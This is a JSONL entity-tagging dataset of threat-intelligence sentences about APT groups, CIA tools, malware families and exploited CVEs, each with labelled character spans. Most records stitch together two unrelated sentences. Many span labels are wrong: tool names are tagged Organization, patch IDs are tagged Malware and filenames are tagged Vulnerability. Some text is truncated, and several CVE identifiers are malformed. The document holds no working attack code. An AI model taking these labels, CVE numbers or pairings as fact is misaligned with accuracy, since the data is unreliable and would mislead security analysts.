{"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 96, "end": 99, "label": "System"}, {"start": 275, "end": 278, "label": "System"}, {"start": 281, "end": 298, "label": "Indicator"}, {"start": 323, "end": 326, "label": "System"}, {"start": 335, "end": 355, "label": "Indicator"}]}
{"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": [{"start": 67, "end": 77, "label": "System"}, {"start": 112, "end": 125, "label": "Organization"}, {"start": 237, "end": 243, "label": "System"}, {"start": 249, "end": 270, "label": "Indicator"}, {"start": 319, "end": 324, "label": "Malware"}]}
{"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": [{"start": 13, "end": 29, "label": "Organization"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 197, "end": 218, "label": "Indicator"}, {"start": 235, "end": 246, "label": "Malware"}, {"start": 250, "end": 270, "label": "Malware"}]}
{"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 177, "end": 184, "label": "Vulnerability"}, {"start": 194, "end": 210, "label": "Indicator"}, {"start": 211, "end": 220, "label": "Indicator"}, {"start": 305, "end": 313, "label": "Malware"}]}
{"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 264, "end": 280, "label": "Indicator"}, {"start": 300, "end": 338, "label": "Organization"}, {"start": 341, "end": 345, "label": "Organization"}, {"start": 367, "end": 377, "label": "Organization"}, {"start": 382, "end": 395, "label": "Organization"}]}
{"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": [{"start": 4, "end": 7, "label": "Organization"}, {"start": 122, "end": 134, "label": "Indicator"}]}
{"text": "As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 29, "end": 36, "label": "System"}, {"start": 223, "end": 247, "label": "Organization"}, {"start": 281, "end": 302, "label": "Indicator"}, {"start": 318, "end": 344, "label": "Malware"}]}
{"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . The first attack started in early July with a ShimRatReporter payload .", "spans": [{"start": 70, "end": 75, "label": "Organization"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 278, "end": 293, "label": "Indicator"}]}
{"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": [{"start": 116, "end": 119, "label": "Organization"}, {"start": 376, "end": 387, "label": "Organization"}, {"start": 437, "end": 454, "label": "Indicator"}, {"start": 535, "end": 541, "label": "Malware"}]}
{"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 184, "end": 200, "label": "Indicator"}, {"start": 225, "end": 231, "label": "Malware"}, {"start": 258, "end": 272, "label": "Indicator"}, {"start": 315, "end": 322, "label": "Vulnerability"}]}
{"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 187, "end": 189, "label": "System"}, {"start": 250, "end": 260, "label": "Indicator"}, {"start": 265, "end": 287, "label": "Indicator"}]}
{"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": [{"start": 73, "end": 76, "label": "Organization"}, {"start": 245, "end": 254, "label": "Indicator"}, {"start": 287, "end": 294, "label": "System"}, {"start": 317, "end": 321, "label": "Indicator"}]}
{"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 203, "end": 213, "label": "Indicator"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 267, "end": 283, "label": "Indicator"}]}
{"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 70, "end": 80, "label": "Organization"}, {"start": 91, "end": 97, "label": "Organization"}, {"start": 177, "end": 190, "label": "Organization"}, {"start": 214, "end": 230, "label": "Organization"}, {"start": 231, "end": 239, "label": "Vulnerability"}, {"start": 287, "end": 314, "label": "Indicator"}, {"start": 317, "end": 344, "label": "Indicator"}]}
{"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 110, "end": 125, "label": "System"}, {"start": 167, "end": 172, "label": "Indicator"}, {"start": 173, "end": 180, "label": "Vulnerability"}, {"start": 196, "end": 212, "label": "System"}, {"start": 229, "end": 242, "label": "Vulnerability"}]}
{"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 120, "end": 125, "label": "System"}, {"start": 141, "end": 152, "label": "System"}, {"start": 203, "end": 210, "label": "Malware"}, {"start": 244, "end": 270, "label": "Indicator"}]}
{"text": "The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 63, "end": 69, "label": "System"}, {"start": 203, "end": 218, "label": "Organization"}, {"start": 288, "end": 295, "label": "Indicator"}, {"start": 380, "end": 382, "label": "System"}, {"start": 426, "end": 429, "label": "Indicator"}]}
{"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 111, "label": "System"}, {"start": 245, "end": 260, "label": "Indicator"}]}
{"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 39, "end": 43, "label": "Organization"}, {"start": 327, "end": 333, "label": "Indicator"}]}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 173, "end": 177, "label": "Indicator"}, {"start": 178, "end": 186, "label": "Malware"}, {"start": 306, "end": 312, "label": "Malware"}]}
{"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": [{"start": 335, "end": 342, "label": "Indicator"}, {"start": 422, "end": 425, "label": "System"}]}
{"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 232, "end": 245, "label": "Indicator"}, {"start": 290, "end": 301, "label": "Organization"}]}
{"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}, {"start": 210, "end": 228, "label": "Indicator"}, {"start": 263, "end": 266, "label": "System"}, {"start": 278, "end": 293, "label": "Indicator"}]}
{"text": "In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . ined in the archive is called DriverInstallerU.exe\u201d but its metadata shows that its original name is Interenet Assistant.exe\u201d .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 156, "end": 177, "label": "Indicator"}, {"start": 227, "end": 251, "label": "Indicator"}]}
{"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 444, "end": 451, "label": "Indicator"}, {"start": 454, "end": 461, "label": "Indicator"}, {"start": 472, "end": 479, "label": "Indicator"}]}
{"text": "In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 125, "end": 136, "label": "Indicator"}, {"start": 142, "end": 154, "label": "Malware"}, {"start": 210, "end": 212, "label": "System"}]}
{"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 235, "end": 246, "label": "Indicator"}, {"start": 301, "end": 303, "label": "System"}]}
{"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": [{"start": 62, "end": 67, "label": "Organization"}, {"start": 291, "end": 298, "label": "Indicator"}, {"start": 303, "end": 311, "label": "Indicator"}]}
{"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 257, "end": 275, "label": "Indicator"}]}
{"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 351, "end": 358, "label": "Indicator"}, {"start": 363, "end": 372, "label": "Organization"}]}
{"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 294, "end": 297, "label": "Malware"}, {"start": 412, "end": 425, "label": "Indicator"}]}
{"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . We can observe that the sample is very recent , created on Thursday , July 4", "spans": [{"start": 218, "end": 232, "label": "Organization"}, {"start": 267, "end": 273, "label": "Indicator"}]}
{"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}, {"start": 141, "end": 162, "label": "Organization"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 259, "end": 274, "label": "Indicator"}, {"start": 296, "end": 306, "label": "Indicator"}]}
{"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 125, "end": 147, "label": "System"}, {"start": 154, "end": 173, "label": "Indicator"}, {"start": 179, "end": 189, "label": "Malware"}]}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 335, "end": 346, "label": "Indicator"}, {"start": 358, "end": 370, "label": "Indicator"}]}
{"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 56, "label": "System"}, {"start": 264, "end": 277, "label": "Vulnerability"}, {"start": 284, "end": 287, "label": "Indicator"}]}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 256, "end": 265, "label": "Indicator"}, {"start": 276, "end": 288, "label": "Organization"}]}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . One hour later , Bemstour was used against an educational institution in Belgium .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 190, "end": 198, "label": "Indicator"}, {"start": 246, "end": 253, "label": "Indicator"}]}
{"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": [{"start": 31, "end": 46, "label": "Organization"}, {"start": 51, "end": 71, "label": "System"}, {"start": 94, "end": 106, "label": "System"}, {"start": 117, "end": 126, "label": "System"}, {"start": 189, "end": 203, "label": "Vulnerability"}, {"start": 209, "end": 218, "label": "System"}, {"start": 243, "end": 251, "label": "Indicator"}, {"start": 305, "end": 326, "label": "Malware"}]}
{"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": [{"start": 75, "end": 91, "label": "Organization"}, {"start": 136, "end": 148, "label": "Indicator"}]}
{"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": [{"start": 11, "end": 27, "label": "Organization"}, {"start": 96, "end": 104, "label": "Vulnerability"}, {"start": 155, "end": 163, "label": "Indicator"}, {"start": 164, "end": 171, "label": "Vulnerability"}]}
{"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 131, "end": 139, "label": "Indicator"}]}
{"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": [{"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 199, "end": 207, "label": "Indicator"}]}
{"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Development of Bemstour has continued into 2019 .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 99, "end": 112, "label": "Vulnerability"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 147, "end": 155, "label": "Indicator"}]}
{"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan ( Backdoor.Filensfer ) .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 109, "end": 123, "label": "Vulnerability"}, {"start": 308, "end": 316, "label": "Indicator"}, {"start": 347, "end": 352, "label": "Indicator"}, {"start": 353, "end": 361, "label": "Indicator"}, {"start": 421, "end": 439, "label": "Malware"}, {"start": 440, "end": 446, "label": "Malware"}, {"start": 449, "end": 467, "label": "Malware"}]}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 174, "end": 182, "label": "Indicator"}, {"start": 191, "end": 199, "label": "Organization"}, {"start": 273, "end": 281, "label": "Vulnerability"}, {"start": 311, "end": 320, "label": "Organization"}]}
{"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 148, "end": 157, "label": "Indicator"}]}
{"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 83, "end": 96, "label": "Vulnerability"}, {"start": 109, "end": 132, "label": "Organization"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 199, "end": 208, "label": "Indicator"}, {"start": 360, "end": 375, "label": "Indicator"}, {"start": 376, "end": 392, "label": "Malware"}]}
{"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 20, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 237, "end": 244, "label": "Vulnerability"}, {"start": 245, "end": 265, "label": "Indicator"}, {"start": 270, "end": 289, "label": "Indicator"}]}
{"text": "Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 32, "end": 43, "label": "Organization"}, {"start": 109, "end": 117, "label": "Vulnerability"}, {"start": 130, "end": 137, "label": "Vulnerability"}, {"start": 145, "end": 159, "label": "Indicator"}, {"start": 173, "end": 187, "label": "Indicator"}, {"start": 194, "end": 201, "label": "Vulnerability"}, {"start": 206, "end": 219, "label": "Indicator"}]}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 132, "end": 135, "label": "System"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 172, "end": 184, "label": "Indicator"}]}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 148, "end": 155, "label": "Indicator"}, {"start": 168, "end": 179, "label": "Indicator"}]}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 147, "end": 156, "label": "Indicator"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 263, "end": 272, "label": "Indicator"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 101, "label": "Indicator"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 158, "end": 168, "label": "Indicator"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Today , this malware is still actively being used against the Philippines .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 222, "end": 229, "label": "Indicator"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . Xagent\u201d is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 96, "label": "Indicator"}, {"start": 122, "end": 132, "label": "Indicator"}, {"start": 172, "end": 176, "label": "Indicator"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 231, "end": 238, "label": "Indicator"}, {"start": 282, "end": 298, "label": "Indicator"}, {"start": 342, "end": 358, "label": "Indicator"}, {"start": 380, "end": 389, "label": "Organization"}]}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 153, "end": 166, "label": "Indicator"}, {"start": 259, "end": 268, "label": "Indicator"}]}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 175, "end": 189, "label": "Indicator"}, {"start": 209, "end": 226, "label": "Indicator"}]}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Indicator"}, {"start": 277, "end": 295, "label": "Indicator"}]}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 169, "end": 185, "label": "Indicator"}, {"start": 192, "end": 200, "label": "Indicator"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 84, "end": 88, "label": "Organization"}, {"start": 101, "end": 106, "label": "Indicator"}]}
